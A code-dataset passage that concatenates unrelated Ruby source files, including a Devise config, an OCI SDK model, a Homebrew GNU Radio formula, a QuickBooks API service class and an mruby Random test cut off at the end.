# Don't put a too small interval or your users won't have the time to
# change their passwords.
config.reset_password_within = 6.hours
# When set to false, does not sign a user in automatically after their password is
# reset. Defaults to true, so a user is signed in automatically after a reset.
# config.sign_in_after_reset_password = true
# ==> Configuration for :encryptable
# Allow you to use another hashing or encryption algorithm besides bcrypt (default).
# You can use :sha1, :sha512 or algorithms from others authentication tools as
# :clearance_sha1, :authlogic_sha512 (then you should set stretches above to 20
# for default behavior) and :restful_authentication_sha1 (then you should set
# stretches to 10, and copy REST_AUTH_SITE_KEY to pepper).
#
# Require the `devise-encryptable` gem when using anything other than bcrypt
# config.encryptor = :sha512
# ==> Scopes configuration
# Turn scoped views on. Before rendering "sessions/new", it will first check for
# "users/sessions/new". It's turned off by default because it's slower if you
# are using only default views.
# config.scoped_views = false
# Configure the default scope given to Warden. By default it's the first
# devise role declared in your routes (usually :user).
# config.default_scope = :user
# Set this configuration to false if you want /users/sign_out to sign out
# only the current scope. By default, Devise signs out all scopes.
# config.sign_out_all_scopes = true
# ==> Navigation configuration
# Lists the formats that should be treated as navigational. Formats like
# :html, should redirect to the sign in page when the user does not have
# access, but formats like :xml or :json, should return 401.
#
# If you have any extra navigational formats, like :iphone or :mobile, you
# should add them to the navigational formats lists.
#
# The "*/*" below is required to match Internet Explorer requests.
# config.navigational_formats = ['*/*', :html]
# The default HTTP method used to sign out a resource. Default is :delete.
config.sign_out_via = :delete
# ==> OmniAuth
# Add a new OmniAuth provider. Check the wiki for more information on setting
# up on your models and hooks.
# config.omniauth :github, 'APP_ID', 'APP_SECRET', scope: 'user,public_repo'
# ==> Warden configuration
# If you want to use other strategies, that are not supported by Devise, or
# change the failure app, you can configure them inside the config.warden block.
#
# config.warden do |manager|
# manager.intercept_401 = false
# manager.default_strategies(scope: :user).unshift :some_external_strategy
# end
# ==> Mountable engine configurations
# When using Devise inside an engine, let's call it `MyEngine`, and this engine
# is mountable, there are some extra configurations to be taken into account.
# The following options are available, assuming the engine is mounted as:
#
# mount MyEngine, at: '/my_engine'
#
# The router that invoked `devise_for`, in the example above, would be:
# config.router_name = :my_engine
#
# When using OmniAuth, Devise cannot automatically set OmniAuth path,
# so you need to do it manually. For the users scope, it would be:
# config.omniauth_path_prefix = '/my_engine/users/auth'
end
| 49.071942 | 154 | 0.751356 |
7a798346539467d00366624c609cd41e4aad2451 | 13,185 | # Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
require 'date'
# rubocop:disable Lint/UnneededCopDisableDirective, Metrics/LineLength
module OCI
# The request body used to create a Ping monitor.
class Healthchecks::Models::CreatePingMonitorDetails
PROTOCOL_ENUM = [
PROTOCOL_ICMP = 'ICMP'.freeze,
PROTOCOL_TCP = 'TCP'.freeze
].freeze
# **[Required]** The OCID of the compartment.
# @return [String]
attr_accessor :compartment_id
# **[Required]** A list of targets (hostnames or IP addresses) of the probe.
# @return [Array<String>]
attr_accessor :targets
# A list of names of vantage points from which to execute the probe.
# @return [Array<String>]
attr_accessor :vantage_point_names
# The port on which to probe endpoints. If unspecified, probes will use the
# default port of their protocol.
#
# @return [Integer]
attr_accessor :port
# The probe timeout in seconds. Valid values: 10, 20, 30, and 60.
# The probe timeout must be less than or equal to `intervalInSeconds` for monitors.
#
# @return [Integer]
attr_accessor :timeout_in_seconds
# This attribute is required.
# @return [String]
attr_reader :protocol
# **[Required]** A user-friendly and mutable name suitable for display in a user interface.
# @return [String]
attr_accessor :display_name
# **[Required]** The monitor interval in seconds. Valid values: 10, 30, and 60.
#
# @return [Integer]
attr_accessor :interval_in_seconds
# Enables or disables the monitor. Set to 'true' to launch monitoring.
#
# @return [BOOLEAN]
attr_accessor :is_enabled
# Free-form tags for this resource. Each tag is a simple key-value pair with no
# predefined name, type, or namespace. For more information,
# see [Resource Tags](https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm).
# Example: `{\"Department\": \"Finance\"}`
#
# @return [Hash<String, String>]
attr_accessor :freeform_tags
# Defined tags for this resource. Each key is predefined and scoped to a namespace.
# For more information, see [Resource Tags](https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm).
# Example: `{\"Operations\": {\"CostCenter\": \"42\"}}`
#
# @return [Hash<String, Hash<String, Object>>]
attr_accessor :defined_tags
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
# rubocop:disable Style/SymbolLiteral
'compartment_id': :'compartmentId',
'targets': :'targets',
'vantage_point_names': :'vantagePointNames',
'port': :'port',
'timeout_in_seconds': :'timeoutInSeconds',
'protocol': :'protocol',
'display_name': :'displayName',
'interval_in_seconds': :'intervalInSeconds',
'is_enabled': :'isEnabled',
'freeform_tags': :'freeformTags',
'defined_tags': :'definedTags'
# rubocop:enable Style/SymbolLiteral
}
end
# Attribute type mapping.
def self.swagger_types
{
# rubocop:disable Style/SymbolLiteral
'compartment_id': :'String',
'targets': :'Array<String>',
'vantage_point_names': :'Array<String>',
'port': :'Integer',
'timeout_in_seconds': :'Integer',
'protocol': :'String',
'display_name': :'String',
'interval_in_seconds': :'Integer',
'is_enabled': :'BOOLEAN',
'freeform_tags': :'Hash<String, String>',
'defined_tags': :'Hash<String, Hash<String, Object>>'
# rubocop:enable Style/SymbolLiteral
}
end
# rubocop:disable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity
# rubocop:disable Metrics/MethodLength, Layout/EmptyLines, Style/SymbolLiteral
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
# @option attributes [String] :compartment_id The value to assign to the {#compartment_id} property
# @option attributes [Array<String>] :targets The value to assign to the {#targets} property
# @option attributes [Array<String>] :vantage_point_names The value to assign to the {#vantage_point_names} property
# @option attributes [Integer] :port The value to assign to the {#port} property
# @option attributes [Integer] :timeout_in_seconds The value to assign to the {#timeout_in_seconds} property
# @option attributes [String] :protocol The value to assign to the {#protocol} property
# @option attributes [String] :display_name The value to assign to the {#display_name} property
# @option attributes [Integer] :interval_in_seconds The value to assign to the {#interval_in_seconds} property
# @option attributes [BOOLEAN] :is_enabled The value to assign to the {#is_enabled} property
# @option attributes [Hash<String, String>] :freeform_tags The value to assign to the {#freeform_tags} property
# @option attributes [Hash<String, Hash<String, Object>>] :defined_tags The value to assign to the {#defined_tags} property
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }
self.compartment_id = attributes[:'compartmentId'] if attributes[:'compartmentId']
raise 'You cannot provide both :compartmentId and :compartment_id' if attributes.key?(:'compartmentId') && attributes.key?(:'compartment_id')
self.compartment_id = attributes[:'compartment_id'] if attributes[:'compartment_id']
self.targets = attributes[:'targets'] if attributes[:'targets']
self.vantage_point_names = attributes[:'vantagePointNames'] if attributes[:'vantagePointNames']
raise 'You cannot provide both :vantagePointNames and :vantage_point_names' if attributes.key?(:'vantagePointNames') && attributes.key?(:'vantage_point_names')
self.vantage_point_names = attributes[:'vantage_point_names'] if attributes[:'vantage_point_names']
self.port = attributes[:'port'] if attributes[:'port']
self.timeout_in_seconds = attributes[:'timeoutInSeconds'] if attributes[:'timeoutInSeconds']
raise 'You cannot provide both :timeoutInSeconds and :timeout_in_seconds' if attributes.key?(:'timeoutInSeconds') && attributes.key?(:'timeout_in_seconds')
self.timeout_in_seconds = attributes[:'timeout_in_seconds'] if attributes[:'timeout_in_seconds']
self.protocol = attributes[:'protocol'] if attributes[:'protocol']
self.display_name = attributes[:'displayName'] if attributes[:'displayName']
raise 'You cannot provide both :displayName and :display_name' if attributes.key?(:'displayName') && attributes.key?(:'display_name')
self.display_name = attributes[:'display_name'] if attributes[:'display_name']
self.interval_in_seconds = attributes[:'intervalInSeconds'] if attributes[:'intervalInSeconds']
raise 'You cannot provide both :intervalInSeconds and :interval_in_seconds' if attributes.key?(:'intervalInSeconds') && attributes.key?(:'interval_in_seconds')
self.interval_in_seconds = attributes[:'interval_in_seconds'] if attributes[:'interval_in_seconds']
self.is_enabled = attributes[:'isEnabled'] unless attributes[:'isEnabled'].nil?
self.is_enabled = true if is_enabled.nil? && !attributes.key?(:'isEnabled') # rubocop:disable Style/StringLiterals
raise 'You cannot provide both :isEnabled and :is_enabled' if attributes.key?(:'isEnabled') && attributes.key?(:'is_enabled')
self.is_enabled = attributes[:'is_enabled'] unless attributes[:'is_enabled'].nil?
self.is_enabled = true if is_enabled.nil? && !attributes.key?(:'isEnabled') && !attributes.key?(:'is_enabled') # rubocop:disable Style/StringLiterals
self.freeform_tags = attributes[:'freeformTags'] if attributes[:'freeformTags']
raise 'You cannot provide both :freeformTags and :freeform_tags' if attributes.key?(:'freeformTags') && attributes.key?(:'freeform_tags')
self.freeform_tags = attributes[:'freeform_tags'] if attributes[:'freeform_tags']
self.defined_tags = attributes[:'definedTags'] if attributes[:'definedTags']
raise 'You cannot provide both :definedTags and :defined_tags' if attributes.key?(:'definedTags') && attributes.key?(:'defined_tags')
self.defined_tags = attributes[:'defined_tags'] if attributes[:'defined_tags']
end
# rubocop:enable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity
# rubocop:enable Metrics/MethodLength, Layout/EmptyLines, Style/SymbolLiteral
# Custom attribute writer method checking allowed values (enum).
# @param [Object] protocol Object to be assigned
def protocol=(protocol)
raise "Invalid value for 'protocol': this must be one of the values in PROTOCOL_ENUM." if protocol && !PROTOCOL_ENUM.include?(protocol)
@protocol = protocol
end
# rubocop:disable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity, Layout/EmptyLines
# Checks equality by comparing each attribute.
# @param [Object] other the other object to be compared
def ==(other)
return true if equal?(other)
self.class == other.class &&
compartment_id == other.compartment_id &&
targets == other.targets &&
vantage_point_names == other.vantage_point_names &&
port == other.port &&
timeout_in_seconds == other.timeout_in_seconds &&
protocol == other.protocol &&
display_name == other.display_name &&
interval_in_seconds == other.interval_in_seconds &&
is_enabled == other.is_enabled &&
freeform_tags == other.freeform_tags &&
defined_tags == other.defined_tags
end
# rubocop:enable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity, Layout/EmptyLines
# @see the `==` method
# @param [Object] other the other object to be compared
def eql?(other)
self == other
end
# rubocop:disable Metrics/AbcSize, Layout/EmptyLines
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[compartment_id, targets, vantage_point_names, port, timeout_in_seconds, protocol, display_name, interval_in_seconds, is_enabled, freeform_tags, defined_tags].hash
end
# rubocop:enable Metrics/AbcSize, Layout/EmptyLines
# rubocop:disable Metrics/AbcSize, Layout/EmptyLines
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.swagger_types.each_pair do |key, type|
if type =~ /^Array<(.*)>/i
# check to ensure the input is an array given that the the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
public_method("#{key}=").call(
attributes[self.class.attribute_map[key]]
.map { |v| OCI::Internal::Util.convert_to_type(Regexp.last_match(1), v) }
)
end
elsif !attributes[self.class.attribute_map[key]].nil?
public_method("#{key}=").call(
OCI::Internal::Util.convert_to_type(type, attributes[self.class.attribute_map[key]])
)
end
# or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# rubocop:enable Metrics/AbcSize, Layout/EmptyLines
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = public_method(attr).call
next if value.nil? && !instance_variable_defined?("@#{attr}")
hash[param] = _to_hash(value)
end
hash
end
private
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
# rubocop:enable Lint/UnneededCopDisableDirective, Metrics/LineLength
| 42.395498 | 245 | 0.687979 |
1aa8868a67c33d1d7b27f154e67190c542c542bc | 330 | Deface::Override.new(:virtual_path => "spree/admin/shared/sub_menu/_configuration",
:name => "add_bank_settings",
:insert_bottom => "[data-hook='admin_configurations_sidebar_menu'], #admin_configurations_sidebar_menu[data-hook]",
:text => "<%= configurations_sidebar_menu_item('Lista de Bancos', admin_banks_path) %>") | 82.5 | 119 | 0.751515 |
ffe606eefe58951fa458d89de9491f224a9e15f2 | 115 | require 'rubygems'
require 'thin'
require 'sinatra'
require File.expand_path '../app.rb', __FILE__
run MyApp.new
| 14.375 | 46 | 0.747826 |
6a97ed16128f59712232bddc23a41d1da08b266f | 157 | # frozen_string_literal: true
##
# Class: Directory model
#
class Directory < Sequel::Model
plugin MatPath::Plugin
dataset_module MatPath::Datasets
end
| 15.7 | 34 | 0.764331 |
08f17bfcc242622308e050fd2579828e7e9cb538 | 336 | module BlockStack
module Validations
class NotEmpty < Validation
protected
def validate(value, expression)
!(value.nil? || value.respond_to?(:empty?) && value.empty?)
end
def default_message
"#{clean_attribute_name} must#{inverse? ? nil : ' not'} be empty."
end
end
end
end
| 18.666667 | 74 | 0.613095 |
1d45be1dfc4bed0a12b3f26fae0baf15ec3c4a53 | 6,777 | class Gnuradio < Formula
desc "SDK providing the signal processing runtime and processing blocks"
homepage "https://gnuradio.org/"
url "https://gnuradio.org/releases/gnuradio/gnuradio-3.7.13.4.tar.gz"
sha256 "c536c268b1e9c24f1206bbc881a5819ac46e662f4e8beaded6f3f441d3502f0d"
revision 4
head "https://github.com/gnuradio/gnuradio.git"
bottle do
sha256 "60fc854609cec6c8d9ccbe8a1d6fd5636748318376fe8effe3998b9c3d0a0fb1" => :mojave
sha256 "33a166a3abd211d7e0c456a3b991f8b24759e517f55a192941a0e945adfd7905" => :high_sierra
sha256 "c9b67dc92407723541c408a4d2fb614b852f06b55511dd9d0a9036e8318a7638" => :sierra
end
depends_on "cmake" => :build
depends_on "doxygen" => :build
depends_on "pkg-config" => :build
depends_on "sphinx-doc" => :build
depends_on "swig" => :build
depends_on "boost"
depends_on "fftw"
depends_on "gsl"
depends_on "numpy"
depends_on "portaudio"
depends_on "python@2"
depends_on "uhd"
depends_on "zeromq"
# cheetah starts here
resource "Markdown" do
url "https://files.pythonhosted.org/packages/b3/73/fc5c850f44af5889192dff783b7b0d8f3fe8d30b65c8e3f78f8f0265fecf/Markdown-2.6.11.tar.gz"
sha256 "a856869c7ff079ad84a3e19cd87a64998350c2b94e9e08e44270faef33400f81"
end
resource "Cheetah" do
url "https://files.pythonhosted.org/packages/cd/b0/c2d700252fc251e91c08639ff41a8a5203b627f4e0a2ae18a6b662ab32ea/Cheetah-2.4.4.tar.gz"
sha256 "be308229f0c1e5e5af4f27d7ee06d90bb19e6af3059794e5fd536a6f29a9b550"
end
# cheetah ends here
resource "lxml" do
url "https://files.pythonhosted.org/packages/54/a6/43be8cf1cc23e3fa208cab04ba2f9c3b7af0233aab32af6b5089122b44cd/lxml-4.2.3.tar.gz"
sha256 "622f7e40faef13d232fb52003661f2764ce6cdef3edb0a59af7c1559e4cc36d1"
end
resource "MarkupSafe" do
url "https://files.pythonhosted.org/packages/4d/de/32d741db316d8fdb7680822dd37001ef7a448255de9699ab4bfcbdf4172b/MarkupSafe-1.0.tar.gz"
sha256 "a6be69091dac236ea9c6bc7d012beab42010fa914c459791d627dad4910eb665"
end
resource "Mako" do
url "https://files.pythonhosted.org/packages/eb/f3/67579bb486517c0d49547f9697e36582cd19dafb5df9e687ed8e22de57fa/Mako-1.0.7.tar.gz"
sha256 "4e02fde57bd4abb5ec400181e4c314f56ac3e49ba4fb8b0d50bba18cb27d25ae"
end
resource "six" do
url "https://files.pythonhosted.org/packages/16/d8/bc6316cf98419719bd59c91742194c111b6f2e85abac88e496adefaf7afe/six-1.11.0.tar.gz"
sha256 "70e8a77beed4562e7f14fe23a786b54f6296e34344c23bc42f07b15018ff98e9"
end
resource "cppzmq" do
url "https://raw.githubusercontent.com/zeromq/cppzmq/46fc0572c5e9f09a32a23d6f22fd79b841f77e00/zmq.hpp"
sha256 "964031c0944f913933f55ad1610938105a6657a69d1ac5a6dd50e16a679104d5"
end
def install
ENV.prepend_path "PATH", "/System/Library/Frameworks/Python.framework/Versions/2.7/bin"
ENV["CHEETAH_INSTALL_WITHOUT_SETUPTOOLS"] = "1"
ENV["XML_CATALOG_FILES"] = etc/"xml/catalog"
ENV.prepend_create_path "PYTHONPATH", libexec/"vendor/lib/python2.7/site-packages"
%w[Markdown Cheetah MarkupSafe Mako six].each do |r|
resource(r).stage do
system "python", *Language::Python.setup_install_args(libexec/"vendor")
end
end
begin
# Fix "ld: file not found: /usr/lib/system/libsystem_darwin.dylib" for lxml
ENV["SDKROOT"] = MacOS.sdk_path if MacOS.version == :sierra
resource("lxml").stage do
system "python", *Language::Python.setup_install_args(libexec/"vendor")
end
ensure
ENV.delete("SDKROOT")
end
resource("cppzmq").stage include.to_s
args = std_cmake_args + %W[
-DGR_PKG_CONF_DIR=#{etc}/gnuradio/conf.d
-DGR_PREFSDIR=#{etc}/gnuradio/conf.d
-DENABLE_DEFAULT=OFF
]
enabled = %w[GR_ANALOG GR_FFT VOLK GR_FILTER GNURADIO_RUNTIME
GR_BLOCKS GR_PAGER GR_NOAA GR_CHANNELS GR_AUDIO
GR_FCD GR_VOCODER GR_FEC GR_DIGITAL GR_DTV GR_ATSC
GR_TRELLIS GR_ZEROMQ GR_WAVELET GR_UHD DOXYGEN SPHINX
PYTHON GR_UTILS]
enabled.each do |c|
args << "-DENABLE_#{c}=ON"
end
mkdir "build" do
system "cmake", "..", *args
system "make"
system "make", "install"
end
rm bin.children.reject(&:executable?)
bin.env_script_all_files(libexec/"bin", :PYTHONPATH => ENV["PYTHONPATH"])
end
test do
assert_match version.to_s, shell_output("#{bin}/gnuradio-config-info -v")
(testpath/"test.c++").write <<~EOS
#include <gnuradio/top_block.h>
#include <gnuradio/blocks/null_source.h>
#include <gnuradio/blocks/null_sink.h>
#include <gnuradio/blocks/head.h>
#include <gnuradio/gr_complex.h>
class top_block : public gr::top_block {
public:
top_block();
private:
gr::blocks::null_source::sptr null_source;
gr::blocks::null_sink::sptr null_sink;
gr::blocks::head::sptr head;
};
top_block::top_block() : gr::top_block("Top block") {
long s = sizeof(gr_complex);
null_source = gr::blocks::null_source::make(s);
null_sink = gr::blocks::null_sink::make(s);
head = gr::blocks::head::make(s, 1024);
connect(null_source, 0, head, 0);
connect(head, 0, null_sink, 0);
}
int main(int argc, char **argv) {
top_block top;
top.run();
}
EOS
system ENV.cxx, "-L#{lib}", "-L#{Formula["boost"].opt_lib}",
"-lgnuradio-blocks", "-lgnuradio-runtime", "-lgnuradio-pmt",
"-lboost_system", testpath/"test.c++", "-o", testpath/"test"
system "./test"
(testpath/"test.py").write <<~EOS
from gnuradio import blocks
from gnuradio import gr
class top_block(gr.top_block):
def __init__(self):
gr.top_block.__init__(self, "Top Block")
self.samp_rate = 32000
s = gr.sizeof_gr_complex
self.blocks_null_source_0 = blocks.null_source(s)
self.blocks_null_sink_0 = blocks.null_sink(s)
self.blocks_head_0 = blocks.head(s, 1024)
self.connect((self.blocks_head_0, 0),
(self.blocks_null_sink_0, 0))
self.connect((self.blocks_null_source_0, 0),
(self.blocks_head_0, 0))
def main(top_block_cls=top_block, options=None):
tb = top_block_cls()
tb.start()
tb.wait()
main()
EOS
system "python2.7", testpath/"test.py"
cd testpath do
system "#{bin}/gr_modtool", "newmod", "test"
cd "gr-test" do
system "#{bin}/gr_modtool", "add", "-t", "general", "test_ff", "-l",
"python", "-y", "--argument-list=''", "--add-python-qa",
"--copyright=brew"
end
end
end
end
| 35.296875 | 139 | 0.678619 |
1c6baff0509eb86af0c54218dea09677ebceb4d2 | 10,514 | module Quickbooks
module Service
class BaseService
include Quickbooks::Util::Logging
include ServiceCrud
attr_accessor :company_id
attr_accessor :oauth
attr_reader :base_uri
attr_reader :last_response_body
attr_reader :last_response_xml
XML_NS = %{xmlns="http://schema.intuit.com/finance/v3"}
HTTP_CONTENT_TYPE = 'application/xml'
HTTP_ACCEPT = 'application/xml'
HTTP_ACCEPT_ENCODING = 'gzip, deflate'
BASE_DOMAIN = 'quickbooks.api.intuit.com'
SANDBOX_DOMAIN = 'sandbox-quickbooks.api.intuit.com'
def initialize(attributes = {})
domain = Quickbooks.sandbox_mode ? SANDBOX_DOMAIN : BASE_DOMAIN
@base_uri = "https://#{domain}/v3/company"
attributes.each {|key, value| public_send("#{key}=", value) }
end
def access_token=(token)
@oauth = token
end
def company_id=(company_id)
@company_id = company_id
end
# realm & company are synonymous
def realm_id=(company_id)
@company_id = company_id
end
def url_for_resource(resource)
"#{url_for_base}/#{resource}"
end
def url_for_base
raise MissingRealmError.new unless @company_id
"#{@base_uri}/#{@company_id}"
end
def default_model_query
"SELECT * FROM #{self.class.name.split("::").last}"
end
def url_for_query(query = nil, start_position = 1, max_results = 20)
query ||= default_model_query
query = "#{query} STARTPOSITION #{start_position} MAXRESULTS #{max_results}"
"#{url_for_base}/query?query=#{URI.encode_www_form_component(query)}"
end
private
def parse_xml(xml)
@last_response_xml = Nokogiri::XML(xml)
end
def valid_xml_document(xml)
%Q{<?xml version="1.0" encoding="utf-8"?>\n#{xml.strip}}
end
# A single object response is the same as a collection response except
# it just has a single main element
def fetch_object(model, url, params = {})
raise ArgumentError, "missing model to instantiate" if model.nil?
response = do_http_get(url, params)
collection = parse_collection(response, model)
if collection.is_a?(Quickbooks::Collection)
collection.entries.first
else
nil
end
end
def fetch_collection(query, model, options = {})
page = options.fetch(:page, 1)
per_page = options.fetch(:per_page, 20)
start_position = ((page - 1) * per_page) + 1 # page=2, per_page=10 then we want to start at 11
max_results = per_page
response = do_http_get(url_for_query(query, start_position, max_results))
parse_collection(response, model)
end
def parse_collection(response, model)
if response
collection = Quickbooks::Collection.new
xml = @last_response_xml
begin
results = []
query_response = xml.xpath("//xmlns:IntuitResponse/xmlns:QueryResponse")[0]
if query_response
start_pos_attr = query_response.attributes['startPosition']
if start_pos_attr
collection.start_position = start_pos_attr.value.to_i
end
max_results_attr = query_response.attributes['maxResults']
if max_results_attr
collection.max_results = max_results_attr.value.to_i
end
total_count_attr = query_response.attributes['totalCount']
if total_count_attr
collection.total_count = total_count_attr.value.to_i
end
end
path_to_nodes = "//xmlns:IntuitResponse//xmlns:#{model::XML_NODE}"
collection.count = xml.xpath(path_to_nodes).count
if collection.count > 0
xml.xpath(path_to_nodes).each do |xa|
entry = model.from_xml(xa)
addition = xml.xpath(path_to_nodes)[0].xpath("//xmlns:Currency").children.to_s if "#{model::XML_NODE}" == "Reports"
entry.currency = addition if "#{model::XML_NODE}" == "Reports"
collection.body = response.body if "#{model::XML_NODE}" == "Reports"
results << entry
end
end
collection.entries = results
rescue => ex
raise Quickbooks::IntuitRequestException.new("Error parsing XML: #{ex.message}")
end
collection
else
nil
end
end
# Given an IntuitResponse which is expected to wrap a single
# Entity node, e.g.
# <IntuitResponse xmlns="http://schema.intuit.com/finance/v3" time="2013-11-16T10:26:42.762-08:00">
# <Customer domain="QBO" sparse="false">
# <Id>1</Id>
# ...
# </Customer>
# </IntuitResponse>
def parse_singular_entity_response(model, xml, node_xpath_prefix = nil)
xmldoc = Nokogiri(xml)
prefix = node_xpath_prefix || model::XML_NODE
xmldoc.xpath("//xmlns:IntuitResponse/xmlns:#{prefix}")[0]
end
# A successful delete request returns a XML packet like:
# <IntuitResponse xmlns="http://schema.intuit.com/finance/v3" time="2013-04-23T08:30:33.626-07:00">
# <Payment domain="QBO" status="Deleted">
# <Id>8748</Id>
# </Payment>
# </IntuitResponse>
def parse_singular_entity_response_for_delete(model, xml)
xmldoc = Nokogiri(xml)
xmldoc.xpath("//xmlns:IntuitResponse/xmlns:#{model::XML_NODE}[@status='Deleted']").length == 1
end
def do_http_post(url, body = "", params = {}, headers = {}) # throws IntuitRequestException
url = add_query_string_to_url(url, params)
do_http(:post, url, body, headers)
end
def do_http_get(url, params = {}, headers = {}) # throws IntuitRequestException
url = add_query_string_to_url(url, params)
do_http(:get, url, {}, headers)
end
def do_http_file_upload(uploadIO, url, metadata = nil)
headers = {
'Content-Type' => 'multipart/form-data'
}
body = {}
body['file_content_0'] = uploadIO
if metadata
standalone_prefix = '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
meta_data_xml = "#{standalone_prefix}\n#{metadata.to_xml_ns.to_s}"
param_part = UploadIO.new(StringIO.new(meta_data_xml), "application/xml")
body['file_metadata_0'] = param_part
end
do_http(:upload, url, body, headers)
end
def do_http(method, url, body, headers) # throws IntuitRequestException
if @oauth.nil?
raise "OAuth client has not been initialized. Initialize with setter access_token="
end
unless headers.has_key?('Content-Type')
headers['Content-Type'] = HTTP_CONTENT_TYPE
end
unless headers.has_key?('Accept')
headers['Accept'] = HTTP_ACCEPT
end
unless headers.has_key?('Accept-Encoding')
headers['Accept-Encoding'] = HTTP_ACCEPT_ENCODING
end
log "------ QUICKBOOKS-RUBY REQUEST ------"
log "METHOD = #{method}"
log "RESOURCE = #{url}"
log "REQUEST BODY:"
log(log_xml(body))
log "REQUEST HEADERS = #{headers.inspect}"
response = case method
when :get
@oauth.get(url, headers)
when :post
@oauth.post(url, body, headers)
when :upload
@oauth.post_with_multipart(url, body, headers)
else
raise "Do not know how to perform that HTTP operation"
end
check_response(response, :request_xml => body)
end
def add_query_string_to_url(url, params)
if params.is_a?(Hash) && !params.empty?
url + "?" + params.collect { |k| "#{k.first}=#{k.last}" }.join("&")
else
url
end
end
def check_response(response, options = {})
log "------ QUICKBOOKS-RUBY RESPONSE ------"
log "RESPONSE CODE = #{response.code}"
log "RESPONSE BODY:"
log(log_xml(response.plain_body))
parse_xml(response.plain_body)
status = response.code.to_i
case status
when 200
# even HTTP 200 can contain an error, so we always have to peek for an Error
if response_is_error?
parse_and_raise_exception(options)
else
response
end
when 302
raise "Unhandled HTTP Redirect"
when 401
raise Quickbooks::AuthorizationFailure
when 403
raise Quickbooks::Forbidden
when 400, 500
parse_and_raise_exception(options)
when 503, 504
raise Quickbooks::ServiceUnavailable
else
raise "HTTP Error Code: #{status}, Msg: #{response.plain_body}"
end
end
def parse_and_raise_exception(options = {})
err = parse_intuit_error
ex = Quickbooks::IntuitRequestException.new("#{err[:message]}:\n\t#{err[:detail]}")
ex.code = err[:code]
ex.detail = err[:detail]
ex.type = err[:type]
ex.request_xml = options[:request_xml]
raise ex
end
def response_is_error?
@last_response_xml.xpath("//xmlns:IntuitResponse/xmlns:Fault")[0] != nil
rescue Nokogiri::XML::XPath::SyntaxError => exception
true
end
def parse_intuit_error
error = {:message => "", :detail => "", :type => nil, :code => 0}
fault = @last_response_xml.xpath("//xmlns:IntuitResponse/xmlns:Fault")[0]
if fault
error[:type] = fault.attributes['type'].value
error_element = fault.xpath("//xmlns:Error")[0]
if error_element
code_attr = error_element.attributes['code']
if code_attr
error[:code] = code_attr.value
end
element_attr = error_element.attributes['element']
if code_attr
error[:element] = code_attr.value
end
error[:message] = error_element.xpath("//xmlns:Message").text
error[:detail] = error_element.xpath("//xmlns:Detail").text
end
end
error
rescue Nokogiri::XML::XPath::SyntaxError => exception
error[:detail] = @last_response_xml.to_s
error
end
end
end
end
| 33.591054 | 131 | 0.592258 |
e964d15d31357d903d510f225bfada82aeeb34f0 | 1,240 | # frozen_string_literal: true
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
# [START cloudtasks_v2beta3_generated_CloudTasks_DeleteQueue_sync]
require "google/cloud/tasks/v2beta3"
# Create a client object. The client can be reused for multiple calls.
client = Google::Cloud::Tasks::V2beta3::CloudTasks::Client.new
# Create a request. To set request fields, pass in keyword arguments.
request = Google::Cloud::Tasks::V2beta3::DeleteQueueRequest.new
# Call the delete_queue method.
result = client.delete_queue request
# The returned object is of type Google::Protobuf::Empty.
p result
# [END cloudtasks_v2beta3_generated_CloudTasks_DeleteQueue_sync]
| 36.470588 | 74 | 0.783065 |
bfb9b10e8cbc64e215ed32e73c622dc7417c32ed | 532 | # frozen_string_literal: true
Sequel.seed(:development, :test) do # Applies only to "development" and "test" environments
def run
User.create \
full_name: "Richard Feynman",
profession: "Theoretical physicist",
username: "rfeynman",
password: "271828"
end
end
Sequel.seed do # Wildcard Seed; applies to every environment
def run
[
["USD", "United States dollar"],
["BRL", "Brazilian real"]
].each do |abbr, name|
Currency.create abbr: abbr, name: name
end
end
end
| 23.130435 | 91 | 0.648496 |
01d231d5ce339d9a650edec45e77ae1a7ff2fdeb | 412 | ##
# Random Test
assert("Random#srand") do
r1 = Random.new(123)
r2 = Random.new(123)
r1.rand == r2.rand
end
assert("Kernel::srand") do
srand(234)
r1 = rand
srand(234)
r2 = rand
r1 == r2
end
assert("Random::srand") do
Random.srand(345)
r1 = rand
srand(345)
r2 = Random.rand
r1 == r2
end
assert("fixnum") do
rand(3).class == Fixnum
end
assert("float") do
